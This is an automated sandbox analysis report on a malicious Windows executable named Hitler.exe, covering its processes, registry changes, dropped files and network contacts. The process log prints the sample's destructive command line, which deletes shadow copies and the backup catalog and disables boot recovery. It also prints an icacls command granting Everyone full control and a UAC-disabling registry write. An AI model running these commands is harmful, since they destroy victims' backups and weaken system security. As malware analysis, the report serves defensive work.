File name: Hitler.exe
Full analysis: https://app.any.run/tasks/6764cd4d-5532-4db9-b628-d3fe68f92598
Verdict: Malicious activity
Analysis date: October 01, 2024, 09:15:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: ip-check, upx, evasion
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5: E64DBE09FC1805177D9058A40807E128
SHA1: FC15F43BE27987315C8BCF61FF392FF8AC3E394C
SHA256: 9AE7D51B7C3E729D9FD0EB7B99811DE3270E7B37931FFF1F136EFEB50D276A4C
SSDEEP: 98304:1KAeO3aJCht7w1vmAGkJLptIBdMLKRaIAx8aRDS8TwSsxQt1bzx4bO+L4dr0QTDh:k0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for user acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Deletes shadow copies
      • cmd.exe (PID: 3076)
    • UAC/LUA settings modification
      • Hitler.exe (PID: 2044)
    • Changes the autorun value in the registry
      • Hitler.exe (PID: 2044)
  • SUSPICIOUS
    • Reads security settings of Internet Explorer
      • Hitler.exe (PID: 2044)
    • There is functionality for capturing the public IP (YARA)
      • Hitler.exe (PID: 2044)
    • Executes as a Windows Service
      • VSSVC.exe (PID: 6100)
    • Checks for external IP
      • Hitler.exe (PID: 2044)
    • Starts CMD.EXE for command execution
      • Hitler.exe (PID: 2044)
    • Creates a file in the system drive root
      • Hitler.exe (PID: 2044)
    • Connects to SMTP port
      • Hitler.exe (PID: 2044)
    • Uses ICACLS.EXE to modify access control lists
      • Hitler.exe (PID: 2044)
    • There is functionality for taking screenshots (YARA)
      • Hitler.exe (PID: 2044)
  • INFO
    • Reads the computer name
      • Hitler.exe (PID: 2044)
    • Creates files or folders in the user directory
      • Hitler.exe (PID: 2044)
    • Checks supported languages
      • Hitler.exe (PID: 2044)
    • Creates files in a temporary directory
      • Hitler.exe (PID: 2044)
    • Checks proxy server information
      • Hitler.exe (PID: 2044)
    • Reads the machine GUID from the registry
      • Hitler.exe (PID: 2044)
    • UPX packer has been detected
      • Hitler.exe (PID: 2044)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (33.3)
.exe | UPX compressed Win32 Executable (32.6)
.scr | Windows screen saver (15.8)
.dll | Win32 Dynamic Link Library (generic) (7.9)
.exe | Win32 Executable (generic) (5.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2017:11:05 04:11:25+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 3190784
InitializedDataSize: 335872
UninitializedDataSize: 1032192
EntryPoint: 0x407760
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 133
Monitored processes: 9
Malicious processes: 2
Suspicious processes: 0

Behavior graph

Processes shown in the graph: hitler.exe (THREAT), icacls.exe, cmd.exe, conhost.exe, conhost.exe, wmic.exe, shellexperiencehost.exe, vssvc.exe, hitler.exe

Process information

PID: 1884
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: icacls.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 2008
CMD: "C:\Users\admin\Desktop\Hitler.exe"
Path: C:\Users\admin\Desktop\Hitler.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED)
Modules (images):
c:\users\admin\desktop\hitler.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll

PID: 2044
CMD: "C:\Users\admin\Desktop\Hitler.exe"
Path: C:\Users\admin\Desktop\Hitler.exe
Parent process: explorer.exe
User: admin
Integrity Level: HIGH
Modules (images):
c:\users\admin\desktop\hitler.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll

PID: 2116
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 2132
CMD: "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
Path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Shell Experience Host
Version: 10.0.19041.3758 (WinBuild.160101.0800)
Modules (images):
c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\wincorlib.dll

PID: 2224
CMD: wmic shadowcopy delete
Path: C:\Windows\SysWOW64\wbem\WMIC.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: WMI Commandline Utility
Exit code: 2147749908 (0x80041014)
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

PID: 3076
CMD: cmd /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: Hitler.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Exit code: 1
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

PID: 5988
CMD: icacls . /grant Everyone:F /T /C /Q
Path: C:\Windows\SysWOW64\icacls.exe
Parent process: Hitler.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\icacls.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

PID: 6100
CMD: C:\WINDOWS\system32\vssvc.exe
Path: C:\Windows\System32\VSSVC.exe
Parent process: services.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Microsoft® Volume Shadow Copy Service
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\vssvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 22 233
Read events: 22 226
Write events: 7
Delete events: 0

Modification events

PID 2044 (Hitler.exe) | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | Operation: write | Name: EnableLUA | Value: 0
PID 2044 (Hitler.exe) | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | Operation: write | Name: Adolf Hitler | Value: C:\Users\admin\Desktop\Hitler.exe
PID 2044 (Hitler.exe) | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | Operation: write | Name: CachePrefix | Value: (empty)
PID 2044 (Hitler.exe) | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | Operation: write | Name: CachePrefix | Value: Cookie:
PID 2044 (Hitler.exe) | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | Operation: write | Name: CachePrefix | Value: Visited:
PID 2132 (ShellExperienceHost.exe) | Key: \REGISTRY\A\{876611b9-7607-26c7-3fbd-c5b19abd613e}\LocalState | Operation: write | Name: PeekBadges | Value: 5B005D0000005E1B987CE213DB01
PID 2132 (ShellExperienceHost.exe) | Key: \REGISTRY\A\{876611b9-7607-26c7-3fbd-c5b19abd613e}\LocalState | Operation: write | Name: PeekBadges | Value: 5B005D000000CB91987CE213DB01
Executable files: 2
Suspicious files: 2 754
Text files: 11
Unknown types: 0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2044 | Hitler.exe | (not recorded) | - | - | -
2044 | Hitler.exe | C:\$WinREAgent\Backup\Winre.AdolfHitler | - | - | -
2044 | Hitler.exe | C:\$WinREAgent\Scratch\update.AdolfHitler | - | - | -
2044 | Hitler.exe | C:\Users\admin\AppData\Local\Temp\_Adolf Hitler_.mp3 | binary | 3903D19844A4E4DFB0CD919842B01CCD | C1B11091D66E6E89C0E190AEF1BFD7C5D566BCB03FB90E1A5CB8E8462387CEB4
2044 | Hitler.exe | C:\$Recycle.Bin\S-1-5-21-1693682860-607145093-2874071422-1000\desktop.AdolfHitlerini | - | A526B9E7C716B3489D8CC062FBCE4005 | E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
2044 | Hitler.exe | C:\_Adolf Hitler_.bmp | image | 9EA2048780F96D11B4CE6EA76623B94D | DEDF660BCC7C477A370F2C0899B7E01F9DC73D1EDF12BE0201F6D9C528B43D95
2044 | Hitler.exe | C:\Users\admin\Desktop\AdolfHitler | binary | D9364029A39FF14634FF132E2786CB47 | C399AF25EAFAF9D89B33C5F0613D00B690BE5C11163DE45AA2F5D5739EFBB05F
2044 | Hitler.exe | C:\found.000\file00000004.AdolfHitler | - | - | -
2044 | Hitler.exe | C:\Users\admin\Desktop\_Adolf Hitler_.bmp | image | 9EA2048780F96D11B4CE6EA76623B94D | DEDF660BCC7C477A370F2C0899B7E01F9DC73D1EDF12BE0201F6D9C528B43D95
2044 | Hitler.exe | C:\$Recycle.Bin\S-1-5-21-1693682860-607145093-2874071422-1001\desktop.AdolfHitlerini | - | A526B9E7C716B3489D8CC062FBCE4005 | E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
Download the PCAP, analyze network streams, HTTP content and a lot more in the full report
HTTP(S) requests: 5
TCP/UDP connections: 35
DNS requests: 11
Threats: 3

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
7108 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
2044 | Hitler.exe | GET | 200 | 103.235.46.96:80 | http://www.baidu.com/ | unknown | - | - | whitelisted
2044 | Hitler.exe | GET | 301 | 138.113.149.152:80 | http://www.ip138.com/ | unknown | - | - | whitelisted
2044 | Hitler.exe | GET | 200 | 174.35.118.62:80 | http://top.ip138.com/ | unknown | - | - | unknown
- | - | GET | 302 | 174.35.118.62:443 | https://www.ip138.com/ | unknown | html | 138 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3888 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
- | - | 192.168.100.255:137 | - | - | - | whitelisted
7108 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 20.49.150.241:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | GB | whitelisted
7108 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
2044 | Hitler.exe | 103.235.46.96:80 | www.baidu.com | Beijing Baidu Netcom Science and Technology Co., Ltd. | HK | whitelisted
7108 | svchost.exe | 20.49.150.241:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | GB | whitelisted
2044 | Hitler.exe | 103.129.252.45:25 | smtp.163.com | NETEASE HONG KONG LIMITED | HK | shared

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 4.231.128.59, 20.49.150.241, 20.73.194.208 | whitelisted
google.com | 142.250.184.206 | whitelisted
www.microsoft.com | 95.101.149.131 | whitelisted
www.baidu.com | 103.235.46.96, 103.235.47.188 | whitelisted
smtp.163.com | 103.129.252.45 | shared
www.ip138.com | 138.113.149.152, 163.171.129.134, 174.35.118.62, 174.35.118.63 | whitelisted
top.ip138.com | 174.35.118.62, 138.113.101.14, 174.35.118.63, 163.171.129.134 | unknown

Threats

PID | Process | Class | Message
2044 | Hitler.exe | Generic Protocol Command Decode | SURICATA SMTP no server welcome message
2 ETPRO signatures available in the full report
No debug info